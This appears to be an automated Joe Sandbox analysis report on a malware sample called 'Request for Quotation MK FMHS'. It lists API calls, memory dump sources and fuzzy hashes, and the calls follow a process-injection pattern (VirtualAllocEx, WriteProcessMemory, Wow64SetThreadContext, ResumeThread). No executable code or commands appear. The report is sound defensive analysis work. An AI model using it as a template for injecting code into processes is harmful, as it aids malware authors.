                                                                                                              control_flow_graph 674 6c57ce8-6c57d36 676 6c57d46-6c57d85 WriteProcessMemory 674->676 677 6c57d38-6c57d44 674->677 679 6c57d87-6c57d8d 676->679 680 6c57d8e-6c57dbe 676->680 677->676 679->680
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C57D78
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 609f1e62ac0323a3ed38b4e5458fd9041e97c6f9bbddea95ec1ac01c8b76c29c
                                                                                                              • Instruction ID: e33bfefef89e40a1aabc24aa7bbab3c582e85f01b4d71bdbca55efc7caf5a7be
                                                                                                              • Opcode Fuzzy Hash: 609f1e62ac0323a3ed38b4e5458fd9041e97c6f9bbddea95ec1ac01c8b76c29c
                                                                                                              • Instruction Fuzzy Hash: 54212AB1900349DFCB10CFA9C985BEEBBF5FF48310F10842AE919A7250D7789544DBA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 695 6c57dd0-6c57e65 ReadProcessMemory 698 6c57e67-6c57e6d 695->698 699 6c57e6e-6c57e9e 695->699 698->699
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C57E58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: fb8b823887c85b4ccd8ee9ecf0b481ce90821230f4adbc70affacc3239706910
                                                                                                              • Instruction ID: bf24082c745cb98c297d60af0b836ad6e850ac74bb732ce8876af83ee6613beb
                                                                                                              • Opcode Fuzzy Hash: fb8b823887c85b4ccd8ee9ecf0b481ce90821230f4adbc70affacc3239706910
                                                                                                              • Instruction Fuzzy Hash: 73214CB1D00349DFDB10CFA9C841ADEBBF5FF48320F108429E919A7240D7789940DBA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 684 6c57b48-6c57b9b 687 6c57b9d-6c57ba9 684->687 688 6c57bab-6c57bdb Wow64SetThreadContext 684->688 687->688 690 6c57be4-6c57c14 688->690 691 6c57bdd-6c57be3 688->691 691->690
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C57BCE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: b0a89ad82eae3efaea3583bf74f9000787a86fa4fd725cf4bf0e5fe03d5a51d3
                                                                                                              • Instruction ID: 79d65014ab88a7bc239141bef6b63109fdf175daefbeea93fb0f32987655178d
                                                                                                              • Opcode Fuzzy Hash: b0a89ad82eae3efaea3583bf74f9000787a86fa4fd725cf4bf0e5fe03d5a51d3
                                                                                                              • Instruction Fuzzy Hash: 38212AB1D003098FDB10DFAAC985BEEBBF4AF48324F14842AD559A7240C7789585CBA5
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C57E58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: a148e122ae85f7fb5637b3070254bf7d77331bcb8951a5bf8fd107fc8c43b6c4
                                                                                                              • Instruction ID: 2444140c529542081c558dd32313c86588244adf7b56c1157914cbdd31506972
                                                                                                              • Opcode Fuzzy Hash: a148e122ae85f7fb5637b3070254bf7d77331bcb8951a5bf8fd107fc8c43b6c4
                                                                                                              • Instruction Fuzzy Hash: AC2128B1D00349DFCB10CFAAC881ADEBBF5FF48320F10842AE918A7250C7789940DBA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 703 6c57b50-6c57b9b 705 6c57b9d-6c57ba9 703->705 706 6c57bab-6c57bdb Wow64SetThreadContext 703->706 705->706 708 6c57be4-6c57c14 706->708 709 6c57bdd-6c57be3 706->709 709->708
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C57BCE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 0fa8a3bb4cb16c14218c22e8015c72592a32270d9937064146424bfc61185be8
                                                                                                              • Instruction ID: 063179bcee59e19303695d299be53dde4c176207d09c4311e3f437008dc4e577
                                                                                                              • Opcode Fuzzy Hash: 0fa8a3bb4cb16c14218c22e8015c72592a32270d9937064146424bfc61185be8
                                                                                                              • Instruction Fuzzy Hash: 3D211AB1D003098FDB50DFAAC985BAEBBF4EF58324F14842AD919A7240C7789585CFA5
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EFD677
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 333cb3fff258639ccd6dbeeda22c62cc83541be312086fc4e822148f2865b7ea
                                                                                                              • Instruction ID: deb9fe1d3863202894a9ed76608c6a9566b5cfd77e3c54e1755bd54cb2ee8981
                                                                                                              • Opcode Fuzzy Hash: 333cb3fff258639ccd6dbeeda22c62cc83541be312086fc4e822148f2865b7ea
                                                                                                              • Instruction Fuzzy Hash: CA21C6B5900249DFDB10CF9AD984ADEBFF5EB48320F14841AE918A7350D378A954CF65
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C57C96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 9f6f977db9d282c9f6f22565422693a3e7d3f845f76f0a83dfd94002a0801716
                                                                                                              • Instruction ID: e987ecfc435e6cc8358a4c9c8905151800b22ff5a05ef76ad90780f8cbc72584
                                                                                                              • Opcode Fuzzy Hash: 9f6f977db9d282c9f6f22565422693a3e7d3f845f76f0a83dfd94002a0801716
                                                                                                              • Instruction Fuzzy Hash: 3D1147B19002499FCB20DFAAC845ADEBFF5EF49320F248419E559A7250C775A580DFA1
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C57C96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: ef2d36dc78b5c3a2769ab44ccd0f0cce19c5f7ff693746d008def35d3782235e
                                                                                                              • Instruction ID: b7fd4d5ee2b8a1ce7dedbc6c632658fe576e0d0236cacdca619b3d5492886843
                                                                                                              • Opcode Fuzzy Hash: ef2d36dc78b5c3a2769ab44ccd0f0cce19c5f7ff693746d008def35d3782235e
                                                                                                              • Instruction Fuzzy Hash: 8C113AB1900249DFCB20DFAAC845ADEBFF5EF48320F148419E519A7250C775A540DFA1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 41af379d893512ae1d8363601f72c1c448d7e2f1ec073b799fea55c8a732e2f6
                                                                                                              • Instruction ID: 8c4bd2411677696f1cfce2c0761b4897b126ec4228394387f2fd85de424c83b2
                                                                                                              • Opcode Fuzzy Hash: 41af379d893512ae1d8363601f72c1c448d7e2f1ec073b799fea55c8a732e2f6
                                                                                                              • Instruction Fuzzy Hash: 041149B1D003498ADB20DFAAC845B9EFFF8AF88324F248419D459A7240CA796544CBA5
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: db63e76b6175fd695a15087f6ae6242d1c09d86e8e3eca678e5387663c2d75a8
                                                                                                              • Instruction ID: c541676a91eb34ae0cb77f77f3d47de8716bce16195ab0e4431864eeecb4010e
                                                                                                              • Opcode Fuzzy Hash: db63e76b6175fd695a15087f6ae6242d1c09d86e8e3eca678e5387663c2d75a8
                                                                                                              • Instruction Fuzzy Hash: 34113AB1D003498FDB20DFAAC845B9EFBF9EF88324F24841AD519A7240C7796544CBA5
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C5C39D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 750995ec1c79b7ca144b9cf8ace4f8e807433258f7117007366491f33c496fe8
                                                                                                              • Instruction ID: bd84105a8298e93fb43e84c71bcd2d15394986511f8ef9ec4959afe714ae8aec
                                                                                                              • Opcode Fuzzy Hash: 750995ec1c79b7ca144b9cf8ace4f8e807433258f7117007366491f33c496fe8
                                                                                                              • Instruction Fuzzy Hash: F01128B5800349DFDB60CF9AD845BDEBFF8EB48310F14841AD854A3240C3796584CFA1
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C5C39D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 1a2e32a845a851231607c48185d722260564a01f7c7e83a4258ae694b7ce3944
                                                                                                              • Instruction ID: 36d43084edc42df4bd06a326e8658a94e3d72d4c5368db5a0e5ad9fa880be6f4
                                                                                                              • Opcode Fuzzy Hash: 1a2e32a845a851231607c48185d722260564a01f7c7e83a4258ae694b7ce3944
                                                                                                              • Instruction Fuzzy Hash: 13110AB5800349DFDB50DF9AD945BDEBBF8EB48324F10845AD914A7240C379A944CFA5
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00EFAF5E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 13f19d6d0d5667214fe2c258b81af69017aa39feae431365230dfc600467127b
                                                                                                              • Instruction ID: 77df5ae39f4aa0c6feec266564e0cb6b1efa420d6b426a2373856cd875132a7f
                                                                                                              • Opcode Fuzzy Hash: 13f19d6d0d5667214fe2c258b81af69017aa39feae431365230dfc600467127b
                                                                                                              • Instruction Fuzzy Hash: AC11D2B6D002498FCB20CF9AD444A9EFBF4EB88324F14856AD919BB610C379A545CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2109899984.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_b7d000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 02780d06c8091b631de5b63b1fc77451c6d0206824314e0edb61f649a86511b6
                                                                                                              • Instruction ID: d6fb3a7174af1213c91e9f5c0f1e1628ae72a44782b047c27b43dda2511f0891
                                                                                                              • Opcode Fuzzy Hash: 02780d06c8091b631de5b63b1fc77451c6d0206824314e0edb61f649a86511b6
                                                                                                              • Instruction Fuzzy Hash: 282133B1504200DFCB05DF14C9C0B26BFB5FFA8368F24C5A9E9090B256C336D806DBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2110966424.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_b8d000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd893af9aade855cd90a626d8a43e4b4700f96ceab3350eeb2e007b056c53192
                                                                                                              • Instruction ID: 2bbbfa85fc7c343dd171fdd5b639503c362f73c02f526dc663dba1c77f989dee
                                                                                                              • Opcode Fuzzy Hash: dd893af9aade855cd90a626d8a43e4b4700f96ceab3350eeb2e007b056c53192
                                                                                                              • Instruction Fuzzy Hash: 02213771504200DFCB14EF14D9D0B26BBA5FB84314F20C5AED80A4B2E6C336D807CB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2110966424.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_b8d000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 97ac9b5858a485dbe5cf10d2bbb3be7627fcbfa187ee1f08613b43a5f4796437
                                                                                                              • Instruction ID: fa251b3183cdc75429653bb32b7196bd61b31d570814a0b434ce6e47597edc4d
                                                                                                              • Opcode Fuzzy Hash: 97ac9b5858a485dbe5cf10d2bbb3be7627fcbfa187ee1f08613b43a5f4796437
                                                                                                              • Instruction Fuzzy Hash: 642107B1604204EFDB05EF14D5C0F26BBA5FB84314F24C9AEE9094B2E1C336D846CB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2110966424.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_b8d000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 949668576c96953404e91580b508b08b36f96658d500d1d58a2f82a565ee7763
                                                                                                              • Instruction ID: b7b0ec9d9728eeb25ccccc0b53d9c4c8e7175944118aaebd731cab93954c71d9
                                                                                                              • Opcode Fuzzy Hash: 949668576c96953404e91580b508b08b36f96658d500d1d58a2f82a565ee7763
                                                                                                              • Instruction Fuzzy Hash: 3021A4755093808FDB12DF24D590B15BFB1EB45314F28C5DBD8498B6A7C33AD80ACB62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2109899984.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_b7d000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                              • Instruction ID: d748f547cda720c48e2075e71914327cecb4f92cddcfbbeaf338d368d90610eb
                                                                                                              • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                              • Instruction Fuzzy Hash: E011D376504280CFCB16CF14D5C4B16BFB2FF94328F24C6AAD8494B656C33AD85ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2110966424.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_b8d000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                              • Instruction ID: 829ae08282671ebd9686f066248d0838427e5b58e3641bf736b4c9561e86aa00
                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                              • Instruction Fuzzy Hash: 5C11DD75504280DFCB12DF14C5C0B15FBB2FB84314F24C6AED8494B6A6C33AD84ACB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2109899984.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_b7d000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f4ee0e08c794e9fdbfe5329d35f75e2c9a947f687c66bee43c27421bee8ed0e6
                                                                                                              • Instruction ID: f6a848327a25e122eaa08c9b82c38a7013fbacc57a6a9ca368f2e691799404aa
                                                                                                              • Opcode Fuzzy Hash: f4ee0e08c794e9fdbfe5329d35f75e2c9a947f687c66bee43c27421bee8ed0e6
                                                                                                              • Instruction Fuzzy Hash: 7C0126B10083009AE7288B29CCC0B26FFF8DF513A0F18C99AED1C4A282C7389C40C6B1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2109899984.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_b7d000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c7367db7140124574d00d67e93c18bc71655199854e0edaaadcd575571d5915f
                                                                                                              • Instruction ID: 26005a854e282d4e1765e2e1975f4ed16054a420ab2f5b111d2a62497fded109
                                                                                                              • Opcode Fuzzy Hash: c7367db7140124574d00d67e93c18bc71655199854e0edaaadcd575571d5915f
                                                                                                              • Instruction Fuzzy Hash: 82F0C2714043409EE7248A1ADCC4B62FFE8EF51764F18C55AED1C4A286C379AC44CAB0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d61dca00cbeace4a13019d384e290f88f5dacdc415f880c5ca67e3b129b8e6ab
                                                                                                              • Instruction ID: 1b109adbfd96b9c6c0515e1a780956c6468f539001f4421cf6c0e86162a1ebab
                                                                                                              • Opcode Fuzzy Hash: d61dca00cbeace4a13019d384e290f88f5dacdc415f880c5ca67e3b129b8e6ab
                                                                                                              • Instruction Fuzzy Hash: 5CE10B74E102198FCB54DFA9C9909AEFBF2FF89304F248169D814AB355D731A982CF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 38f0a97ebeba37e867c5dfdd542285d33ab7a45fd8e895d5565682b07919b5d9
                                                                                                              • Instruction ID: 56e53c25107edebb45ac46de5fe34076067d37cb2e5857800b40eabbfbb73619
                                                                                                              • Opcode Fuzzy Hash: 38f0a97ebeba37e867c5dfdd542285d33ab7a45fd8e895d5565682b07919b5d9
                                                                                                              • Instruction Fuzzy Hash: F2E11D74E102198FCB54DFA9C9809AEFBF2FF89304F648159D814AB355D731A982CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c02a013cd1bc0cab62844e8899648eeb107c0a4d03e854dd554c218dd0664256
                                                                                                              • Instruction ID: d4d3502fad2676d3101c3a79fd575e4551fad565791968929d4243debedcc378
                                                                                                              • Opcode Fuzzy Hash: c02a013cd1bc0cab62844e8899648eeb107c0a4d03e854dd554c218dd0664256
                                                                                                              • Instruction Fuzzy Hash: F5E11D74E102198FCB54DFA9C9849AEFBF2FF89304F648159D814AB355D731A982CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07adbae13f4614323db4852f4b527cc29f8ad8b77f5420f368ad238fdc700cfc
                                                                                                              • Instruction ID: ed35dabc121cf31100af3cdaaa2f3cd3b7da4029ce022088c3801765172b8272
                                                                                                              • Opcode Fuzzy Hash: 07adbae13f4614323db4852f4b527cc29f8ad8b77f5420f368ad238fdc700cfc
                                                                                                              • Instruction Fuzzy Hash: 15E11F74E102198FCB54DFA9C9849AEFBF2FF49304F248169D814AB355D731A982CF64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb314e72c14df79dbd47e360dd24ee94f1cb2ed3c0bd35f514535a1f0602d857
                                                                                                              • Instruction ID: b8473eb97db775113cae44d5342dd7058baffad6ee02e75b8b51ac22bf4d0d70
                                                                                                              • Opcode Fuzzy Hash: bb314e72c14df79dbd47e360dd24ee94f1cb2ed3c0bd35f514535a1f0602d857
                                                                                                              • Instruction Fuzzy Hash: 72E10C74E102198FCB54DF99C9809AEFBF2FF89304F648169D814AB355DB31A982CF64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 774b5a8312f870a34479a520da1b8a0ce0f0ba7fab9ca58fd4e41dbe6dcc37aa
                                                                                                              • Instruction ID: 9cc419200c2cd3f5e32ee9417fb3a5957aedc85c8cb4042b8600da63e7502c28
                                                                                                              • Opcode Fuzzy Hash: 774b5a8312f870a34479a520da1b8a0ce0f0ba7fab9ca58fd4e41dbe6dcc37aa
                                                                                                              • Instruction Fuzzy Hash: FBA14E32A11209CFCF15DFB4C8805AEB7B2FF85304B1595BAEA05BB266DB71D915CB40
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xwq$Xwq$Xwq$Xwq$Xwq$Xwq
                                                                                                              • API String ID: 0-2833233147
                                                                                                              • Opcode ID: 825f41ef59a8c0d92b53f8585cd1c9e45ac4e8fb1032e8ee2a1c0a73a96ad1e6
                                                                                                              • Instruction ID: b4e30c33f63c2bd41b5cd35e250fc2bf6d3c0d3a696c5f5d0196e702ff7736fb
                                                                                                              • Opcode Fuzzy Hash: 825f41ef59a8c0d92b53f8585cd1c9e45ac4e8fb1032e8ee2a1c0a73a96ad1e6
                                                                                                              • Instruction Fuzzy Hash: FD420973D28754CFCBA2CF74C8C66AB7BB0BB45320B48945ED4469A242EB39DD00CB95
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (osq$(osq$(osq$,wq$,wq
                                                                                                              • API String ID: 0-1903262254
                                                                                                              • Opcode ID: 9e1aca12a60622e0a9160520f78916b5112eea916c553e221e4ac60879d75189
                                                                                                              • Instruction ID: 2f011c2e413228c6b69e30fa52a4157318f04841865480e9dda6a6bd95413b75
                                                                                                              • Opcode Fuzzy Hash: 9e1aca12a60622e0a9160520f78916b5112eea916c553e221e4ac60879d75189
                                                                                                              • Instruction Fuzzy Hash: 73224B30A6025A9FDB55CF68D884AAEBFF6BF88314F958069ED05EB261D730DC41CB50
                                                                                                              Strings
                                                                                                              Memory Dump Source
